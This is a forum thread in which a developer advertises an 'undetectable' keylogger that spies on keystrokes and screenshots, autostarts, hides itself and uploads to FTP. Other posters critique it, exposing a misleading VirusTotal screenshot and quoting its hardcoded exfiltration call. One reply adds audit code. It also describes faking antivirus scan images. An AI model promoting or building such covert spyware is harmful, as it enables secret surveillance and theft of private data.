Blackcat Keylogger

**DISCLAIMER: OUR TOOLS ARE FOR EDUCATIONAL PURPOSES ONLY. DON’T USE THEM FOR ILLEGAL ACTIVITIES. YOU ARE THE ONLY ONE RESPONSIBLE FOR YOUR ACTIONS! OUR TOOLS ARE OPEN SOURCE, WITH NO WARRANTY, AND PROVIDED AS IS.**


Blackcat Keylogger is a 100% invisible keylogger, not only to users but also undetectable by antivirus software. Blackcat Keylogger monitors all keystrokes and mouse clicks. It has a separate process which continuously captures system screenshots and sends them to an FTP server at a given interval.

FEATURES OF BLACKCAT KEYLOGGER

  • Discreet/Tamper Proof: By design, Advance Keylogger is undetectable and thus cannot be tampered with or removed by kids/employees (who are often tech savvy). It does not appear in the Registry, the Process List, the System Tray, the Task Manager, on the Desktop, or in Add/Remove Programs.
  • Keystrokes Typed: See every keystroke typed, even if it is deleted. This keystroke logger feature provides a reader-friendly version of all keystrokes logged along with the raw keylogging activity, so you can see every detail.
  • Continuous Screenshots: Video-style playback of screenshots for programs and websites selected by you. For example, watch an email as it’s being typed and edited instead of just seeing the finished product (1,000 screenshots included with purchase).
  • FTP Server: The screenshots and the keylogger log file, which contain sensitive user information, are sent to an FTP server (Mobile/Web/System). The powerful FTP server is also written in core Visual C++.
  • AutoStart: The keylogger has the functionality to auto-execute on system boot-up. It inserts an entry into the system startup programs while it is running.
  • AutoCopy: The keylogger has the functionality to copy itself automatically into the %appdata%/roaming/wpdnse/ folder.

For more details, visit GitHub: https://github.com/ajayrandhawa/Blackcat-Keylogger

I’m always happy to find new open source software to learn something from its code, but there are some things that don’t add up with this one, starting from the picture of the VirusTotal report you included in the GitHub repository:

[Screenshot: black_cat_keylogger VirusTotal report]

  • Having your files tagged as being published by a trusted developer takes quite an effort: VirusTotal needs to verify the file is actually benign, and that takes some time, so people can trust them when they say the file isn’t malicious and comes from someone with a good reputation. I’m pretty sure they would notice this is a keylogger if they checked; I’ll explain why later. So this is a little suspicious already. “A little”.
  • Why did you remove the file name from the report? The keylogger has two different executables, each with its own name, so it’s impossible to tell which one you scanned from this screenshot, and why would you want to do that when advertising your 100% stealthy software? Don’t you think it’s a little bit fishy?
  • Well damn, that’s a high community score. I wouldn’t expect more than a thousand people voting this file as benign; how odd.
  • And finally, why didn’t you include the actual link to the scan instead of making a screenshot? I think I know why.

You have two different executables in the repository, one to capture keystrokes and another to send the logs over FTP (we’ll come to that later). The SHA-256 hash of the actual keylogger program is this:

53e57c196cc3c46937947309c9b0988e2c3a7ddb2d19be9cba9390ac6d65c069

While this is the hash of the other executable:

d975aec8184308df033b5fad5dfa2293d1a15814b31b1ebf671fabbd7c04841a

They are both different from the hash in the picture, and in fact they give two completely different results from VirusTotal: logger (27/68), sender (26/68).

The only way I managed to obtain the same hash you have in your picture with these executables is by dragging and dropping the files from the .rar archive straight into VirusTotal, without extracting them into another folder first. It’s quite curious really, but anyway, this is the scan I obtained with that method. I include only one because both files returned the exact same hash and the same file name, which seems to change every few scans: right now the file is called “293”, score 0/59, community score +812. Clicking on it again gave me a new name: “playview.apk”. In the Details tab you can actually see all the different names VirusTotal has collected for the same file, and I have to admit I was surprised when I saw “<PATH_SAMPLE>” in the list.

We can conclude that the screenshot on GitHub isn’t accurate or trustworthy, because after a couple of tests I discovered that any file you extract from a .rar archive like that will give the exact same harmless-looking hash. That’s why the result is 0/59: you’re not actually scanning the original files. I still have to understand whether this depends on the archive manager being used; I only tried with WinRAR because I’m lazy. But I think I just discovered a way to trick naive people with pictures of VirusTotal scans.

So the keylogger isn’t really “100% invisible”: even Defender moved it to quarantine when I tried to download the archive from GitHub, and I had to whitelist it in order to finish the download. The same happened when I extracted the executables, flagging them as “Trojan:Win32/Tiggre!rfn”.

Finally, I haven’t tested the program because I don’t have a Windows VM at hand, but I did take a look at the code and I noticed a couple of things in the two functions that send logs and images over FTP. Here’s an extract from the ftplogsend() function:

hFtpSession = InternetConnect(hInternet,"192.168.8.2",2121,NULL,NULL,INTERNET_SERVICE_FTP,0,0);
InternetSetOption(hInternet,INTERNET_OPTION_SEND_TIMEOUT,&rec_timeout,sizeof(rec_timeout));

You hardcoded an IP address and port into the program, so if I didn’t want to recompile everything from scratch I would have to change my subnet mask, since the default mask for home networks is 255.255.255.0 (and the provided address is Class C, so I can’t receive the logs unless I have my own server in the local network of my target), giving only 254 possible addresses, which do not include 192.168.8.2; and then I would also need to set up a static address for my FTP server.

Although the detail that caught my eye is another one: no credentials are needed to upload files to the FTP server. Those two NULL parameters inside the call to InternetConnect() are supposed to be the username and password used to access the server, but requiring no credentials means virtually anyone can log in as anonymous and find the entire list of logs and pictures, download them, and even alter them as they please, since it’s possible to overwrite files with a simple put command over FTP, or simply delete them with delete.

This is even worse when you remember that FTP alone provides no encryption whatsoever; everything travels in clear text: anyone on your network can fire up tcpdump or Wireshark, intercept your server’s IP address and port, and view every screenshot and log that is being sent. Also, 2121 is an unusual port number; a local firewall could block those outbound packets quite easily if it was set up properly.

So… this isn’t really all that secure, is it? I could see this as a little experimental project, but you mentioned “1,000 screenshots included with purchase”, so you’re planning to sell it? I don’t know, there already are safe keyloggers out there, free ones too; I wouldn’t recommend anyone buy this particular one if they were looking for a serious security-based program.
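The points made in the reply above about the hardcoded InternetConnect() call (a private address the victim's LAN cannot reach, NULL credentials, an odd port, plain FTP) can be turned into a small audit. This is an added example written for this thread, not code from the Blackcat Keylogger repository: the host, port and NULL credentials are taken from the quoted call, while the victim subnet 192.168.1.0/24 is an assumed default home network that the project does not specify. The live probe at the end is optional and needs network access; everything else runs offline.

```python
"""Audit a hardcoded FTP exfiltration target the way the reply above does.

Added example for this thread; not code from the Blackcat Keylogger project.
Host, port and NULL credentials come from the quoted InternetConnect() call.
The victim subnet is an assumption (a typical /24 home LAN).
"""
import ipaddress
from ftplib import FTP, all_errors

HARDCODED_HOST = "192.168.8.2"            # from the quoted InternetConnect() call
HARDCODED_PORT = 2121                     # from the quoted InternetConnect() call
HARDCODED_USER = None                     # the two NULL parameters: anonymous login
HARDCODED_PASS = None
ASSUMED_VICTIM_SUBNET = "192.168.1.0/24"  # assumption: default 255.255.255.0 home LAN


def usable_hosts(cidr):
    """Host addresses in a subnet, excluding the network and broadcast addresses."""
    return ipaddress.ip_network(cidr, strict=False).num_addresses - 2


def in_victim_subnet(host, cidr):
    """True if the exfil server is reachable on the victim's LAN without
    changing routing or the subnet mask."""
    return ipaddress.ip_address(host) in ipaddress.ip_network(cidr, strict=False)


def audit_exfil_target(host, port, user, password, victim_subnet):
    """Return (severity, finding) tuples for a hardcoded FTP destination."""
    findings = []
    addr = ipaddress.ip_address(host)
    if addr.is_private and not in_victim_subnet(host, victim_subnet):
        findings.append(("high",
                         f"{host} is a private address outside {victim_subnet} "
                         f"({usable_hosts(victim_subnet)} usable hosts): uploads never leave the LAN"))
    elif addr.is_private:
        findings.append(("info",
                         f"{host} is inside {victim_subnet}: only reachable with a server on the same LAN"))
    # None/empty credentials behave like an anonymous login on the server side.
    if not user or not password or user.lower() == "anonymous":
        findings.append(("high",
                         "no credentials: anyone can log in anonymously, then list, download, "
                         "overwrite (put) or delete the logs"))
    if port != 21:
        findings.append(("medium",
                         f"non-standard FTP port {port}: a single egress firewall rule blocks it"))
    findings.append(("high",
                     "plain FTP: host, port, file names and file contents cross the wire in clear text"))
    return findings


def probe_anonymous_ftp(host, port, timeout=5):
    """Live check (needs network): try an anonymous login and return the
    directory listing, or None if the server is unreachable or refuses it."""
    try:
        with FTP() as ftp:
            ftp.connect(host, port, timeout=timeout)
            ftp.login()  # ftplib defaults to user 'anonymous'
            return ftp.nlst()
    except all_errors:
        return None


if __name__ == "__main__":
    for severity, text in audit_exfil_target(HARDCODED_HOST, HARDCODED_PORT, HARDCODED_USER,
                                             HARDCODED_PASS, ASSUMED_VICTIM_SUBNET):
        print(f"[{severity}] {text}")
```

Run it as-is to see the four findings for the quoted configuration; change ASSUMED_VICTIM_SUBNET to 192.168.0.0/16 to reproduce the "change my subnet mask" workaround, under which 192.168.8.2 becomes reachable but the anonymous-login and clear-text findings remain.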


I thoroughly enjoyed this post. Would read again.

10/10


[Screenshots: reg, tskmgr, delsvc, delreg, deldir]

:thinking:

I don’t see any references to mouse activity in your open source code nor in the downloaded executables. :shushing_face:


This is why I love this community. The poor guy was just trying to show off his 100% undetectable super 1337 keylogger, and you all had to go ahead and rip his program a new one. I love 0x00sec.


Pretty sure that’s social capitalism at work.

Sweet sweet social capitalism.

He did make a lot of claims, and everybody here kept him honest to them.

Thanks for All Your Reviews

